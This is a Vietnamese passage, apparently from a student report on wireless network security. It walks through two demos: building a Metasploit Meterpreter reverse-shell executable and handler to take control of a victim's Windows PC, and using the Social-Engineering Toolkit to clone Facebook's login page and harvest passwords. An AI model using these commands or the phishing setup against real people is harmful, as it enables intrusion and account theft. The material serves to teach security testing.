CHƯƠNG II I: PHÂN TÍCH LỖ HỔNG BẢO MẬT VÀ CÁC CÔNG CỤ TẤN CÔNG MẠNG WLAN
3.3.1. Demo sử dụng công cụ Metasploit v4.5.0 có trong Backtrac k5 khai thác máy tính từ xa
thác máy tính từ xa
Đầu tiên ta sẽ tạo ra một tập tin thực thi thiết lập kết nối từ xa từ máy nạn nhân với máy chúng ta thông qua địa chỉ IP và port.
Sử dụng lệnh : msfpayload windows / Meterpreter / reverse_tcp. LHOST =
xxx.xxx.xxx.xxx LPORT = anyportno x> / root / reverse_tcp.exe
Trong đó: LHOST: Là địa chỉ IP máy của chúng ta.
LPORT: Port để lắng nghe.
Hình 3.7 Tạo Payload
Bước tiếp theo chúng ta sẽ thiết lập kết nối tới máy chủ chờ cho máy nạn nhân mở file thực thi vừa tạo ở trên bằng các câu lệnh sau đây:
Use exploit/multi/handler.
Set PAYLOAD windows/meterpreter/reverse_tcp.
Set LHOST 192.168.126.134.
Set LPORT 444.
Exploit.
Hình 3.8 Thiết lập kết nối
Tất cả các kết nối đã được thiết lập. Bây giờ, chỉ việc chờ cho máy nạn nhân mở file thực thi mà chúng ta đã tạo từ trước đó. Hình dưới cho thấy đã truy cập được vào máy nạn nhân.
Hình 3.9 Đã xâm nhập được vào máy nạn nhân
Remote Desktop từ xa thành công
Hình 3.10 Remote Desktop 3.3.2. Demo Tấn công Social-Engineering
Sau khi mở bộ Công cụ Social-Engineering Tookit trong BackTrack và chọn kiểu Tấn công Social-Engineering tiếp tục ta chọn hình thức tấn công, ở đây mình chọn mục hai là tấn công dựa trên lỗ hổng web.
Hình 3.11 Website attack vectors
Hình 3.12 Chọn hình thức tấn công
Bây giờ, chúng ta sẽ tạo ra môt trang đăng nhập giống như trang đăng nhập của facebook.com bằng việc chọn mục hai. Và tiến hành thiết lập địa chỉ IP của máy chủ và gõ trang web muốn sao chép trang đăng nhập.
Hình 3.13 Site clone
Hình 3.15 Tạo thành công trang đăng nhập của facebook
Sau khi hoàn thành tất cả các bước trên thì việc còn lại là ngồi chờ cho nạn nhân đăng nhập từ trang giả mạo và tài khoản sẽ được gửi về máy chủ như hình 3.3.6
Hình 3.16 Mật khẩu máy chủ nhận được